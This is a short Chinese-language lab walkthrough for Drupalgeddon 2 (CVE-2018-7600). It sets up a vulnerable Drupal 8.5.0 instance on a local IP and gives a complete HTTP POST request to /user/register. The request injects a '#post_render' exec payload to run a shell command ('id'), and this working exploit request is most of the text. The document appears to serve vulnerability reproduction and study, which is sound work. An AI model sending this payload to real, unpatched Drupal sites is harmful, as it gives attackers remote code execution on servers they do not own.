Drupal Drupalgeddon 2 远程代码执行漏洞 (CVE-2018-7600)

Drupal Drupalgeddon 2 远程代码执行漏洞 (CVE-2018-7600)

7.58 之前的 Drupal、8.3.9 之前的 8.x、8.4.6 之前的 8.4.x 和 8.5.1 之前的 8.5.x 允许远程攻击者执行任意代码,因为一个问题会影响具有默认或通用模块配置的多个子系统,包括表单 API。

参考:

启动易受攻击的 Drupal 8.5.0 环境。

漏洞利用

环境启动后,访问http://192.168.44.132:8080/,会看到drupal安装页面。使用“标准”配置文件完成 drupal 安装。因为没有mysql环境,安装时应该选择sqlite数据库。安装完成后,您就可以开始利用它了。

参考a2u/CVE-2018-7600,我们可以向drupal发送以下请求:

1
2
3
4
5
6
7
8
9
10
11
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.44.132:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

成功执行代码后,执行 id 命令:

image-20210714141919387

0%